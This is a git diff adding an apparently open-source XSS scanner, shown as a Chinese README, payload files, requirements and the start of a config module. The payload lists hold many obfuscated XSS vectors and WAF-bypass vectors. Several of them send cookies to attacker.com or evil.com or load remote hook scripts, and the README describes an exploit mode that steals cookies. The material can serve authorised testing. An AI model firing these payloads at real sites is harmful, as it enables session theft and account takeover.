diff --git a/README.md b/README.md
index 1bc8ec2..d3b9f0a 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,277 @@
-# xss_scanner_mix
-这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+# 深度XSS漏洞扫描器
+
+这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+
+## 功能特点
+
+- **多种漏洞检测**：
+  - XSS（反射型、存储型、DOM型）
+  - CSRF（跨站请求伪造）
+  - SQL注入
+  - LFI（本地文件包含）
+  - RFI（远程文件包含）
+  - SSRF（服务器端请求伪造）
+  - XXE（XML外部实体注入）
+
+- **全面的扫描能力**：
+  - 网站爬虫功能，自动发现可测试的URL
+  - 表单和参数自动检测
+  - 支持DOM分析
+  - 支持不同测试级别（快速、标准、深度）
+  - 支持多线程扫描
+
+- **网页技术识别**：
+  - 自动识别目标网站使用的编程语言（PHP、ASP.NET、Java、Python等）
+  - 检测前端框架（React、Vue、Angular、jQuery等）
+  - 识别Web服务器类型（Apache、Nginx、IIS等）
+  - 识别CMS系统（WordPress、Joomla、Drupal等）
+  - 框架版本指纹识别
+
+- **高级WAF绕过功能**：
+  - 自动检测目标是否启用Web应用防火墙(WAF)
+  - 识别WAF类型（如Cloudflare、ModSecurity、AWS WAF等）
+  - 自动调整有效载荷以绕过WAF检测
+  - 多种绕过技术（编码变异、分段注入、定时执行等）
+  - 自适应绕过策略，根据WAF反应调整攻击向量
+
+- **增强的XSS检测**：
+  - 支持三个级别(Level 1-3)的XSS有效载荷复杂度
+  - 智能检测技术栈，自动选择最佳攻击向量
+  - 多引擎检测策略（反射型、DOM型、存储型XSS）
+  - 基于真实浏览器的XSS验证
+  - 支持SVG、XML、JSON等特殊环境下的XSS检测
+  - 包含最新的WAF绕过技术
+
+- **高级功能**：
+  - 有效载荷自动绕过WAF
+  - 支持自定义有效载荷
+  - 基于浏览器的漏洞验证
+  - 支持漏洞利用
+  - 支持代理和认证
+
+- **详细报告**：
+  - 多种报告格式（HTML、JSON、XML、TXT）
+  - 详细的漏洞信息和修复建议
+  - 风险评级
+  - 网站技术栈分析报告
+
+## 安装
+
+### 要求
+- Python 3.7+
+- Chrome浏览器（如需浏览器测试）
+
+### 安装步骤
+
+1. 克隆仓库：
+```bash
+git clone https://github.com/achenc1013/XSS_Scanner.git
+cd XSS_Scanner
+```
+
+2. 安装依赖：
+```bash
+pip install -r requirements.txt
+```
+
+3. 安装ChromeDriver（如需浏览器测试）：
+```bash
+# Windows使用以下命令：
+pip install webdriver-manager
+
+# Linux可能需要安装Chrome：
+# sudo apt-get install google-chrome-stable
+```
+
+## 使用方法
+
+### 基本用法
+
+```bash
+python xss_scanner.py -u https://example.com
+```
+
+### 更多示例
+
+**扫描单个URL**：
+```bash
+python xss_scanner.py -u https://example.com
+```
+
+**扫描多个URL**：
+```bash
+python xss_scanner.py -f targets.txt
+```
+
+**深度扫描**：
+```bash
+python xss_scanner.py -u https://example.com --scan-level 3
+```
+
+**只扫描XSS漏洞**：
+```bash
+python xss_scanner.py -u https://example.com --scan-type xss
+```
+
+**使用浏览器进行DOM XSS检测**：
+```bash
+python xss_scanner.py -u https://example.com --browser
+```
+
+**利用发现的漏洞**：
+```bash
+python xss_scanner.py -u https://example.com --exploit
+```
+
+**生成HTML报告**：
+```bash
+python xss_scanner.py -u https://example.com -o report.html --format html
+```
+
+**使用代理**：
+```bash
+python xss_scanner.py -u https://example.com --proxy http://127.0.0.1:8080
+```
+
+### 命令行参数
+
+```
+必选参数:
+  -u, --url URL              目标URL
+  -f, --file FILE            包含目标URL的文件
+
+可选参数:
+  -d, --depth DEPTH          爬虫深度 (默认: 2)
+  -t, --threads THREADS      线程数 (默认: 5)
+  --timeout TIMEOUT          请求超时时间 (默认: 10秒)
+  --user-agent USER_AGENT    自定义User-Agent
+  --cookie COOKIE            请求Cookie
+  --headers HEADERS          自定义HTTP头
+  --proxy PROXY              HTTP代理
+  --scan-level {1,2,3}       扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)
+  --scan-type {all,xss,csrf,sqli,lfi,rfi,ssrf,xxe}
+                             扫描类型 (默认: all)
+  --payload-level {1,2,3}    Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)
+  -o, --output OUTPUT        输出报告文件
+  --format {txt,html,json,xml}
+                             报告格式 (默认: html)
+  -v, --verbose              显示详细输出
+  --no-color                 禁用彩色输出
+
+高级选项:
+  --browser                  使用真实浏览器进行扫描
+  --exploit                  尝试利用发现的漏洞
+  --custom-payloads FILE     自定义Payload文件
+  --exclude REGEX            排除URL模式 (正则表达式)
+  --include REGEX            仅包含URL模式 (正则表达式)
+  --auth USER:PASS           基本认证
+```
+
+## XSS漏洞案例
+
+扫描器能够检测以下XSS攻击场景：
+
+1. **网页留言板获取cookie**：检测表单提交中的XSS漏洞，可能导致cookie泄露
+2. **CMS管理后台伪造钓鱼网站**：检测URL参数中的XSS漏洞，可能用于伪造管理界面
+3. **图片处XSS攻击**：检测图片参数和属性中的XSS漏洞
+4. **SVG-XSS**：检测SVG文件中的XML注入和XSS漏洞
+5. **PDF-XSS**：检测PDF参数中的XSS漏洞
+6. **浏览器翻译-XSS**：检测浏览器翻译功能中的XSS漏洞
+7. **Flash-XSS**：检测Flash参数中的XSS漏洞
+8. **XSS配合MSf钓鱼**：检测可能用于钓鱼的XSS漏洞
+9. **XSS漏洞配合CSRF漏洞**：检测可能与CSRF组合的XSS漏洞
+10. **XSS漏洞配合越权漏洞**：检测可能导致权限提升的XSS漏洞
+11. **前端框架XSS**：检测React、Vue、Angular等前端框架中的XSS漏洞
+12. **模板注入XSS**：检测模板引擎中的XSS漏洞，包括Jinja2、Twig、Handlebars等
+13. **JSON-XSS**：检测JSON数据中的XSS漏洞，包括JSON.parse和eval使用不当
+14. **WebSocket-XSS**：检测WebSocket通信中的XSS漏洞
+15. **PostMessage-XSS**：检测跨域消息传递中的XSS漏洞
+
+## XSS有效载荷级别
+
+扫描器提供了三个级别的XSS有效载荷：
+
+### Level 1 - 基础有效载荷
+最基本的XSS向量，用于检测无防护的网站。包含15个常见的XSS攻击代码。
+
+### Level 2 - 标准有效载荷
+中等复杂度的XSS向量，包含绕过基本过滤的技术。包含约29个XSS攻击代码，结合了多种标签和事件处理程序。
+
+### Level 3 - 高级有效载荷
+最复杂的XSS向量，包含高级编码、混淆和WAF绕过技术。包含约50个复杂的XSS攻击代码，可以绕过大多数WAF和安全过滤器。
+
+## XSS检测技术
+
+扫描器使用多种技术来检测XSS漏洞：
+
+1. **反射型XSS检测**：检测服务器响应中直接反射的用户输入
+2. **DOM型XSS检测**：使用真实浏览器分析DOM操作和事件处理
+3. **存储型XSS检测**：测试在一个页面提交的数据是否在另一个页面中触发XSS
+4. **上下文感知检测**：根据XSS注入点的上下文选择合适的有效载荷
+5. **WAF绕过技术**：使用多种编码和混淆技术绕过WAF防护
+
+## 进阶用法
+
+### 自定义有效载荷
+
+创建一个文本文件，每行包含一个XSS有效载荷，然后使用`--custom-payloads`参数：
+
+```bash
+python xss_scanner.py -u https://example.com --custom-payloads my_payloads.txt
+```
+
+### 漏洞利用
+
+使用`--exploit`参数启用漏洞利用功能：
+
+```bash
+python xss_scanner.py -u https://example.com --exploit
+```
+
+当发现漏洞时，扫描器将尝试进一步利用该漏洞，例如：
+- XSS漏洞：尝试窃取cookie或会话信息
+- SQL注入：尝试提取数据库信息
+- 文件包含：尝试读取敏感文件
+
+### 限制扫描范围
+
+使用正则表达式包含或排除特定URL：
+
+```bash
+# 只扫描/admin/路径下的URL
+python xss_scanner.py -u https://example.com --include "^https://example.com/admin/.*"
+
+# 排除静态资源
+python xss_scanner.py -u https://example.com --exclude "\.(jpg|css|js|png|gif)$"
+```
+
+## 安全和免责声明
+
+此工具仅供安全研究和授权渗透测试使用。未经明确许可，对系统进行扫描可能违反法律。使用者需要：
+
+1. 只在自己拥有的系统上或获得明确授权的系统上使用
+2. 了解并遵守当地的网络安全法律和规定
+3. 负责任地披露发现的安全漏洞
+
+## 贡献
+
+欢迎贡献代码、报告bug或提出功能建议。请通过以下方式参与：
+
+1. Fork仓库
+2. 创建功能分支 (`git checkout -b feature/amazing-feature`)
+3. 提交更改 (`git commit -m 'Add some amazing feature'`)
+4. 推送到分支 (`git push origin feature/amazing-feature`)
+5. 创建Pull Request
+
+## 许可证
+
+本项目采用MIT许可证 - 详情请查看[LICENSE](LICENSE)文件。
+
+## 联系方式
+
+- 项目链接: [https://github.com/achenc1013/XSS_Scanner](https://github.com/achenc1013/XSS_Scanner)
+- 联系邮箱: [1013199991@qq.com](mailto:1013199991@qq.com)
+
+---
+
+**注意**：此工具是为安全专业人员设计的，使用前请确保遵守所有适用的法律和法规。
diff --git a/payloads/xss/xss_level1.txt b/payloads/xss/xss_level1.txt
new file mode 100644
index 0000000..ae0feee
--- /dev/null
+++ b/payloads/xss/xss_level1.txt
@@ -0,0 +1,15 @@
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg onload=alert('XSS')>
+<body onload=alert('XSS')>
+<iframe onload=alert('XSS')></iframe>
+javascript:alert('XSS')
+<input autofocus onfocus=alert('XSS')>
+<select autofocus onfocus=alert('XSS')>
+<textarea autofocus onfocus=alert('XSS')>
+<keygen autofocus onfocus=alert('XSS')>
+<video><source onerror=alert('XSS')>
+<audio src=x onerror=alert('XSS')>
+"><script>alert('XSS')</script>
+'><script>alert('XSS')</script>
+><img src=x onerror=alert('XSS')> 
\ No newline at end of file
diff --git a/payloads/xss/xss_level2.txt b/payloads/xss/xss_level2.txt
new file mode 100644
index 0000000..fbd5db4
--- /dev/null
+++ b/payloads/xss/xss_level2.txt
@@ -0,0 +1,29 @@
+# 基本混淆和绕过技术
+<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>
+<IMG SRC="javascript:alert('XSS');">
+<svg><script>alert&#40;1&#41</script>
+<body onpageshow=alert(1)>
+<body onload=alert('XSS')>
+<input type="text" value="" onfocus="alert('XSS')" autofocus>
+<video><source onerror="javascript:alert('XSS')">
+<iFrAme SRC="javascript:alert('XSS');"></iFramE>
+<div onmouseover="alert('XSS')">XSS</div>
+<marquee onstart='alert("XSS")'>XSS</marquee>
+<img src="/" onerror="alert(String.fromCharCode(88,83,83))"/>
+<svg onload="javascript:alert('XSS')" xmlns="http://www.w3.org/2000/svg"></svg>
+<style>@import 'data:text/css;base64,KiAge2JhY2tncm91bmQtaW1hZ2U6IHVybCgiamF2YXNjcmlwdDphbGVydCgiWFNTIikiKX0=')</style>
+<math><a xlink:href="javascript:alert(1)">click</a></math>
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
+<base href="javascript:alert('XSS')//">
+<script src="data:text/javascript,alert(1)"></script>
+<iframe src="javascript:alert('XSS');"></iframe>
+<form action="javascript:alert('XSS')"><input type="submit"></form>
+<isindex action="javascript:alert('XSS')" type=image>
+<input type="image" src="javascript:alert('XSS');">
+<table background="javascript:alert('XSS')">
+<button form="test" formaction="javascript:alert(1)">XSS</button>
+<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS</a>
+<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.__$+$.__$+$._+"(\\\"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\\")"+$.$$$_)())();</script>
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a> 
\ No newline at end of file
diff --git a/payloads/xss/xss_level3.txt b/payloads/xss/xss_level3.txt
new file mode 100644
index 0000000..26aa120
--- /dev/null
+++ b/payloads/xss/xss_level3.txt
@@ -0,0 +1,50 @@
+# 高级XSS有效载荷与绕过技术
+<script>Function("ale"+"rt(1)")();</script>
+<script>['ale'+'rt'](1)</script>
+<script>window['alert'](0)</script>
+<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
+<svg onload=prompt(1);>
+<script>new Function`alt\`1\``</script>
+<script>(()=>{return this})().alert(1)</script>
+<script>var{a:onerror}={a:eval};throw 'alert\x281\x29'</script>
+<img/id="'`-->" src=x onerror=javascript:alert(2)>
+<img src=x onerror=eval('\141\154\145\162\164\50\61\51')>
+<body/onhashchange=alert(1)><a href=#>click
+<iframe src=javascript:alert(1)//
+<script ~~~>confirm(1)</script ~~~>
+<script>$=Function,$($()\`alert\\\`1\\\`\`)();</script>
+<script>onerror=eval;throw'=alert\x281\x29';</script>
+<script>delete[a],alert(1)</script>
+<svg><discard onbegin=alert(1)>
+<math href="javascript:alert(1)">CLICKME</math>
+<img src=x:alert(alt) onerror=eval(src) alt=xss>
+<a href="j&Tab;a&Tab;v&Tab;asc&Tab;r&Tab;ipt&colon;confirm&lpar;1&rpar;">Click</a>
+<dETAILS open onToGgle=a=alert,a(1)>
+<iframe src="javascript:void(top[Object.keys(top)[2]](Object.keys(top)[5]))" width="500" height="500"></iframe>
+<embed code="//x.test/xss.swf" allowscriptaccess=always></embed>
+<svg><set onbegin=d=document;d.evaluate('\u0061lert(1)',d,null,6,null).iterateNext() >
+<iframe/onload=action=URL;Array(1).keys(a=function(...args)args[0].dispatchEvent(new+Event('focus'))).next(a(body.querySelector('input[autofocus]'))>
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><iframe onload=alert(1)></iframe></annotation-xml></math></option></option></mtext></math>
+<style>:target {color:red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
+<svg><animate onrepeat=alert(1) attributeName=x dur=1m></animate>
+<details/open=/id=x tabindex=1 onfocus=alert(1) id=x>
+<img src onerror=\u0065\u0076\u0061\u006c\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u0059\u0053\u0063\u0072\u0056\u006c\u004e\u0054\u004a\u0027\u0029\u0029>
+<iframe/src="data:text/html,<svg onload=confirm(1)>"><script>~'</script><!--<script>eval('var a=String.fromCharCode(47);var b=String.fromCharCode(42);var c=String.fromCharCode(42);var d=String.fromCharCode(47);eval(\'docu\'+\'ment.bod\'+\'y.inne\'+\'rHTML="Hac\'+\'ked"\');')</script>
+<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
+<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
+<textarea id=ta onfocus=console.log(event)></textarea><div contenteditable onbeforeinput="ta.dispatchEvent(new InputEvent('input', {inputType: 'insertFromPaste', data: 'alert(1)', dataTransfer: new DataTransfer()}))"
+<div style="filter:url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>');">
+<iframe srcdoc="<script>top[8680439..toString(30)](1)</script>">
+<P%=tE%xt><svg/o%=nload=confirm(9)><ClIcK me</SvG>
+<svg><animate onbegin%3D=alert%26%23x28;)></animate>
+<input type="search" onsearch="alert()()()()" />
+<meta charset="x-mac-farsi">\u03C3cript\u03BE alert('xss');</script>
+<scr\0ipt>confirm(1)</scr\0ipt>
+<a onmouseover="document['cookie']=['Cookie Monster!']; alert(document['cookie'])">XSS</a>
+<img/src='data:image/svg+xml,<svg onload=alert(1)>' />
+<input onfocus="alert(document.domain);" autofocus>
+<script>throw{set:document.location='//attacker.com',name:'cookie',message:document.cookie}</script>
+<input autofocus="autofocus"onkeyup="this.focus();var a=this.style.box-shadow; a = document.domain; alert(a);" value="I contain info">
+<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11; id="fuzzelement1">test</a>
+<div style="background:url(http://foo.f/f ='`'><script>alert(1)</script>"><script>alert(1)</script>
+<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"></import> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x onerror=alert(1)>"></t:set> 
\ No newline at end of file
diff --git a/payloads/xss/xss_waf_bypass.txt b/payloads/xss/xss_waf_bypass.txt
new file mode 100644
index 0000000..c2c1043
--- /dev/null
+++ b/payloads/xss/xss_waf_bypass.txt
@@ -0,0 +1,69 @@
+# Cloudflare绕过
+<ScrIpT>prompt(1)</sCrIpT>
+<a/onmouseover=prompt(1)>XSS
+<a/href="j&#97v&#97script&#x3A;&#97lert(1)">XSS
+<svg/onload=confirm(String.fromCharCode(88,83,83))>
+<img/src="x"/onerror=document['cookie'];eval(atob('YWxlcnQoImNvb2tpZSBzdGVhbGVyIik7'));>
+<body/onwheel="[1].find(alert)">Roll ME
+<svg onload=setInterval`alert\u0028document.domain\u0029`>
+<x/onclick=document.location='http://xss.rocks/xss.js'>click me
+
+# ModSecurity绕过
+<details/open/ontoggle="alert`1`">XSS
+<a69/onclick=[1].map(alert)>XSS
+<IfRaMe/src=javascript:alert(1)>
+<l/onclick="[''].findIndex(alert)">l
+<%78%63%72%69%70%74>a=prompt;a(1);</%78%63%72%69%70%74>
+<img src=1 onerror="a=alert;a(1)">
+<img src=1 o&#x6e;error="javascript&colon;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;1&#x29;">
+
+# Imperva绕过
+<iframe/onload='this["src"]="javas&Tab;cript:document["locati&Tab;on"]["replace"]("https://evil.com/"+document["cookie"]);'>
+<img src=x:prompt(eval(atob('ZG9jdW1lbnQuY29va2ll')))>
+<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+<scrIPT x=">" SRC="https://attacker.com/xss.js"></scrIPT>
+<d3"<"/onclick="1>[confirm``]"<">d3
+
+# F5 BIG-IP绕过
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS
+<input type="text" value="> " onkeydown="prompt(1)" autofocus ">
+<form><button formaction=javascript&colon;alert(1)>XSS
+<img/src='x'%0Aonerror=confirm`1`>
+
+# Akamai绕过
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a>
+<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=``&NewLine; onerror=alert(1)&NewLine;``>
+<script>~'<script>'/**/;alert(1)//'</script>
+<style><script>a@import'//XSS.rocks'</script></style>
+
+# 通用WAF绕过
+<svg><animate onbegin=confirm() attributeName=x></svg>
+<script>$=1,$$='ale',$$$='rt',$$$$=`(1)`,eval($$+$$$+$$$$)</script>
+<details ontoggle=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
+<img src=x onerror=\u0065\u0076\u0061\u006c('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<body onpageshow=top['ale'+'rt']('1')>
+<body onpageshow=function(){eval(String.fromCodePoint(97,108,101,114,116,40,49,41))}>
+<math><xss href="javascript:alert(1)">XSS
+<a href="j&X41vascript&colon;alert&lpar;1&rpar;">XSS
+<button autofocus onfocus=top[11000000..toString(36)[0]+628..toString(36)[1]+'ert'](1)></button>
+<img/src="x"/onerror=top['\141\154\145\162\164'](1)>
+<svg><script>+(x=>document[`body`].appendChild(document[`createElement`](`img`)).src=`https://attacker.com/c/`+document[`cookie`])()</script>
+<a href=javascript:alert(1)>XSS
+<img src="x" onerror="window&#46;document&#46;location = '//attacker.com/' + document&#46;cookie;">
+<iframe srcdoc="<a href='javascript:alert(1)'>XSS</a>"></iframe>
+
+# 混淆和编码组合
+<img src=x onerror="Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()">
+<body><template><s id=x onclick=alert()>XSS</s></template></body>
+<img src=x onerror=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<A HREF="h&#x74t&#x70&#x3a&#x2f&#x2f&#x67o&#x6f&#x67&#x6c&#x65&#x2e&#x63&#x6f&#x6d">XSS</A>
+<body><textarea onkeyup='javascript:"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"'></textarea>
+<img%09onerror=alert(1) src=a>
+<i onclick=c&#39;onfirm(1)>click me</i>
+<div id="x">x</div><script>Object.prototype.BUMMER=1;document.getElementById('x').innerHTML='XSS'</script>
+<iframe src="javascript:(function(){var s=document.createElement('script');s.src='//attacker.com/hook.js';document.body.appendChild(s)})()"></iframe>
+<input autofocus onfocus="document.body.appendChild(document.createElement`img`).src='https://attacker.com/c/'+document.cookie">
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><img src=x onerror=alert(1)><annotation-xml>
+<div id="div1"><input value="``onmouseover=alert(1)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> 
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..99b7b24
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,24 @@
+requests>=2.28.0
+beautifulsoup4>=4.11.0
+lxml>=4.9.0
+selenium>=4.3.0
+urllib3>=1.26.9
+colorama>=0.4.5
+tqdm>=4.64.0
+argparse>=1.4.0
+python-dotenv>=0.20.0
+cssselect>=1.1.0
+webdriver-manager>=3.8.0
+dnspython>=2.2.1
+pycurl>=7.45.1
+flask>=2.1.2
+pyOpenSSL>=22.0.0
+cryptography>=37.0.2
+html2text>=2020.1.16
+chardet>=5.0.0
+certifi>=2022.6.15
+pillow>=9.1.1
+parsel>=1.6.0
+aiohttp>=3.8.1
+nest_asyncio>=1.5.5
+yarl>=1.7.2 
\ No newline at end of file
diff --git a/xss_scanner.py b/xss_scanner.py
new file mode 100644
index 0000000..a07c48e
--- /dev/null
+++ b/xss_scanner.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 主入口脚本
+"""
+
+import os
+import sys
+
+# 添加当前目录到Python路径
+sys.path.append(os.path.dirname(os.path.abspath(__file__)))
+
+# 导入主模块
+from xss_scanner.main import main
+
+if __name__ == "__main__":
+    # 调用主函数
+    main() 
\ No newline at end of file
diff --git a/xss_scanner/__init__.py b/xss_scanner/__init__.py
new file mode 100644
index 0000000..c060e15
--- /dev/null
+++ b/xss_scanner/__init__.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 包初始化
+"""
+
+__version__ = '1.0.0'
+__author__ = '高级渗透工程师'
+__description__ = '一个全面的Web应用安全扫描工具，专注于检测XSS漏洞，同时也能够发现其他类型的Web安全漏洞。' 
\ No newline at end of file
diff --git a/xss_scanner/__pycache__/__init__.cpython-313.pyc b/xss_scanner/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..ad536d0
Binary files /dev/null and b/xss_scanner/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/__pycache__/main.cpython-313.pyc b/xss_scanner/__pycache__/main.cpython-313.pyc
new file mode 100644
index 0000000..97d4fbf
Binary files /dev/null and b/xss_scanner/__pycache__/main.cpython-313.pyc differ
diff --git a/xss_scanner/core/__init__.py b/xss_scanner/core/__init__.py
new file mode 100644
index 0000000..7c9de28
--- /dev/null
+++ b/xss_scanner/core/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 核心包""" 
\ No newline at end of file
diff --git a/xss_scanner/core/__pycache__/__init__.cpython-313.pyc b/xss_scanner/core/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..600b236
Binary files /dev/null and b/xss_scanner/core/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/config.cpython-313.pyc b/xss_scanner/core/__pycache__/config.cpython-313.pyc
new file mode 100644
index 0000000..66c1990
Binary files /dev/null and b/xss_scanner/core/__pycache__/config.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/logger.cpython-313.pyc b/xss_scanner/core/__pycache__/logger.cpython-313.pyc
new file mode 100644
index 0000000..d1696ce
Binary files /dev/null and b/xss_scanner/core/__pycache__/logger.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc b/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc
new file mode 100644
index 0000000..f4ed231
Binary files /dev/null and b/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc differ
diff --git a/xss_scanner/core/config.py b/xss_scanner/core/config.py
new file mode 100644
index 0000000..81f2cdf
--- /dev/null
+++ b/xss_scanner/core/config.py
@@ -0,0 +1,405 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+配置模块，负责管理扫描器的配置参数
+"""
+
+import os
+import json
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+class Config:
+    """配置类，管理扫描器的所有配置选项"""
+    
+    def __init__(self):
+        """初始化默认配置"""
+        # 常规选项
+        self.url = None
+        self.depth = 2
+        self.threads = 5
+        self.timeout = 10
+        self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
+        self.cookies = {}
+        self.headers = {}
+        self.proxy = None
+        self.scan_level = 2
+        self.scan_type = 'all'
+        self.payload_level = 2
+        self.output_file = None
+        self.output_format = 'html'
+        self.verbose = False
+        self.no_color = False
+        
+        # 高级选项
+        self.use_browser = False
+        self.exploit = False
+        self.custom_payloads = None
+        self.exclude_pattern = None
+        self.include_pattern = None
+        self.auth = None
+        
+        # 内部使用
+        self.base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+        self.project_root = os.path.dirname(self.base_dir)
+        
+        # 优先检查项目根目录下的payloads目录，如果不存在再使用模块内部的payloads目录
+        self.payloads_dir = os.path.join(self.project_root, 'payloads')
+        if not os.path.exists(self.payloads_dir) or not os.path.isdir(self.payloads_dir):
+            self.payloads_dir = os.path.join(self.base_dir, 'payloads')
+            logger.debug(f"使用模块内部payloads目录: {self.payloads_dir}")
+        else:
+            logger.debug(f"使用项目根目录payloads目录: {self.payloads_dir}")
+    
+    def load_from_args(self, args):
+        """
+        从命令行参数加载配置
+        
+        Args:
+            args: 解析后的命令行参数
+        """
+        # 常规选项
+        if hasattr(args, 'url') and args.url:
+            self.url = args.url
+            
+        if hasattr(args, 'depth') and args.depth is not None:
+            self.depth = args.depth
+            
+        if hasattr(args, 'threads') and args.threads is not None:
+            self.threads = args.threads
+            
+        if hasattr(args, 'timeout') and args.timeout is not None:
+            self.timeout = args.timeout
+            
+        if hasattr(args, 'user_agent') and args.user_agent:
+            self.user_agent = args.user_agent
+            
+        if hasattr(args, 'cookie') and args.cookie:
+            self._parse_cookies(args.cookie)
+            
+        if hasattr(args, 'headers') and args.headers:
+            self._parse_headers(args.headers)
+            
+        if hasattr(args, 'proxy') and args.proxy:
+            self.proxy = args.proxy
+            
+        if hasattr(args, 'scan_level') and args.scan_level is not None:
+            self.scan_level = args.scan_level
+            
+        if hasattr(args, 'scan_type') and args.scan_type:
+            self.scan_type = args.scan_type
+            
+        if hasattr(args, 'payload_level') and args.payload_level is not None:
+            self.payload_level = args.payload_level
+            
+        if hasattr(args, 'output') and args.output:
+            self.output_file = args.output
+            
+        if hasattr(args, 'format') and args.format:
+            self.output_format = args.format
+            
+        if hasattr(args, 'verbose'):
+            self.verbose = args.verbose
+            
+        if hasattr(args, 'no_color'):
+            self.no_color = args.no_color
+        
+        # 高级选项
+        if hasattr(args, 'browser'):
+            self.use_browser = args.browser
+            
+        if hasattr(args, 'exploit'):
+            self.exploit = args.exploit
+            
+        if hasattr(args, 'custom_payloads') and args.custom_payloads:
+            self.custom_payloads = args.custom_payloads
+            
+        if hasattr(args, 'exclude') and args.exclude:
+            self.exclude_pattern = args.exclude
+            
+        if hasattr(args, 'include') and args.include:
+            self.include_pattern = args.include
+            
+        if hasattr(args, 'auth') and args.auth:
+            self._parse_auth(args.auth)
+    
+    def load_from_file(self, config_file):
+        """
+        从配置文件加载配置
+        
+        Args:
+            config_file: 配置文件路径
+        """
+        if not os.path.exists(config_file):
+            logger.error(f"配置文件不存在: {config_file}")
+            return False
+        
+        try:
+            with open(config_file, 'r', encoding='utf-8') as f:
+                config_data = json.load(f)
+            
+            # 常规选项
